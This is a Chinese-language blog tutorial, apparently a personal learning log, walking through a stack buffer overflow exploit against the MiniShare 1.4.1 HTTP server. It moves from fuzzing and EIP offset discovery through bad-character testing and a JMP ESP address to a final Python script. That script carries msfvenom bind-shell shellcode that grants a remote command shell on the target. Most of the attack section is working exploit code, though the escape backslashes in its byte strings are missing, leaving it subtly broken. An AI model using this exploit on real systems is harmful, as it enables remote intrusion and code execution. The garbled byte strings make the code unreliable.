zoukankan      html  css  js  c++  java
  • 缓冲区溢出初探之一

    业余时间学习了buffer overflow ,简单记录一下操作过程。

    文件下载地址:https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

    1.模糊测试

    目的:发送一定量的数据导致程序崩溃。

    #!/usr/share/python
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="A"*2000
    buff+=" HTTP/1.1
    
    "
    s.send(buff)
    s.close()

    结果如图所示:看到eip被重写了。 

    2.确定eip的位置。 

    #!/usr/share/python
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="A"*1787
    buff+="BBBB"
    buff+="CCCCCCCCCCCCCCCCCCC"
    buff+=" HTTP/1.1
    
    "
    s.send(buff)
    s.close()
    

    #!/usr/share/python
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1A
    c2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae
    7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah
    4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1A
    k2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9A
    n0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap
    8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6A
    s7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av
    6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5A
    y6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5B
    b6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be
    6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6B
    h7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7
    Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8
    Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9B
    r0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1
    Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx
    3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4C
    a5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6C
    d7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8C
    g9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0C
    k1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2C
    n3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
    
    buff+=" HTTP/1.1
    
    "
    s.send(buff)
    s.close()
    

    至此,我们已经看到eip已经被重写了。

    3.寻找坏字符

    先用一大批的字符去模糊测试,代码如下:

    #!/usr/share/python
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    badchars = ("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f"
    "x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
    "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f"
    "x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f"
    "x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f"
    "xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf"
    "xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf"
    "xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")
    buff="GET "
    buff+="A"*1787
    buff += "BBBB"
    buff += badchars
    
    buff+=" HTTP/1.1
    
    "
    s.send(buff)
    s.close() 

    结果如下:

    0A,00,00,说明在x0d这里被截断,我们吧x0d去掉,然后在测试,全部通过,如图所示:

    说明坏字符只有x0d和x00

    4.寻找jmp esp

    基本上当崩溃发生时我们希望ESP的内容由EIP执行。这意味着我必须让我的EIP跳转到ESP。这可以通过执行JMP ESP指令来实现。我们将打开服务器并在Immunity Debugger中查找包含JMP ESP指令的可执行模块,然后我们将在EIP上覆盖该指令的内存地址。

    单击View - Executable modules您将看到可执行模块列表

    或者利用mona模块---  !mona jmp -r esp   会在C:Program FilesImmunityIncImmunity Debuggerjmp.txt,如图所示:

     

    我找了其中一个位置:0x77438265

    5.生成shellcode

    利用msf生成shellcode 加到exp中

    #!/usr/share/python
    
    import socket,sys
    
    
    #msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "x00x0d" -f c
    #0x77438265  === x65x82x43x77
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="A"*1787
    buff+="x65x82x43x77"  #address of jmp esp statement form user32.dll
    buff+="x90"*20          #20 NOPs are added
    buff += ("xb8x63x81xa1x61xdbxc8xd9x74x24xf4x5dx29xc9xb1"
    "x53x83xc5x04x31x45x0ex03x26x8fx43x94x54x67x01"
    "x57xa4x78x66xd1x41x49xa6x85x02xfax16xcdx46xf7"
    "xddx83x72x8cx90x0bx75x25x1ex6axb8xb6x33x4exdb"
    "x34x4ex83x3bx04x81xd6x3ax41xfcx1bx6ex1ax8ax8e"
    "x9ex2fxc6x12x15x63xc6x12xcax34xe9x33x5dx4exb0"
    "x93x5cx83xc8x9dx46xc0xf5x54xfdx32x81x66xd7x0a"
    "x6axc4x16xa3x99x14x5fx04x42x63xa9x76xffx74x6e"
    "x04xdbxf1x74xaexa8xa2x50x4ex7cx34x13x5cxc9x32"
    "x7bx41xccx97xf0x7dx45x16xd6xf7x1dx3dxf2x5cxc5"
    "x5cxa3x38xa8x61xb3xe2x15xc4xb8x0fx41x75xe3x47"
    "xa6xb4x1bx98xa0xcfx68xaax6fx64xe6x86xf8xa2xf1"
    "xe9xd2x13x6dx14xddx63xa4xd3x89x33xdexf2xb1xdf"
    "x1exfax67x75x16x5dxd8x68xdbx1dx88x2cx73xf6xc2"
    "xa2xacxe6xecx68xc5x8fx10x93xf8x13x9cx75x90xbb"
    "xc8x2ex0cx7ex2fxe7xabx81x05x5fx5bxc9x4fx58x64"
    "xcax45xcexf2x41x8axcaxe3x55x87x7ax74xc1x5dxeb"
    "x37x73x61x26xafx10xf0xadx2fx5exe9x79x78x37xdf"
    "x73xecxa5x46x2ax12x34x1ex15x96xe3xe3x98x17x61"
    "x5fxbfx07xbfx60xfbx73x6fx37x55x2dxc9xe1x17x87"
    "x83x5exfex4fx55xadxc1x09x5axf8xb7xf5xebx55x8e"
    "x0axc3x31x06x73x39xa2xe9xaexf9xd2xa3xf2xa8x7a"
    "x6ax67xe9xe6x8dx52x2ex1fx0ex56xcfxe4x0ex13xca"
    "xa1x88xc8xa6xbax7cxeex15xbax54")
    
    buff+=" HTTP/1.1
    
    "
    s.send(buff)
    s.close()
    

      

    6.漏洞利用

  • 相关阅读:
    组合两个表(sql查询语句)
    The six Day 数组中找出和为目标值
    实时监控-CPU
    使用 python 的细碎总结
    Visual Studio 2017 运行、调试使用CMake构建的多可执行程序项目
    git 学习笔记 —— 在不同的提交间进行切换和重置( git reset/reflog/tag 命令)
    git 学习笔记 —— 保留/丢弃当前分支修改并切换至其他分支
    git 学习笔记 —— 获取远端仓库以及提交信息至远端 git remote/fetch/branch
    git 学习记录—— git 中的仓库、文件状态等概念介绍
    VScode 配置 C++ 环境进行编译和调试
  • 原文地址:https://www.cnblogs.com/whoami101/p/9476933.html
Copyright © 2011-2022 走看看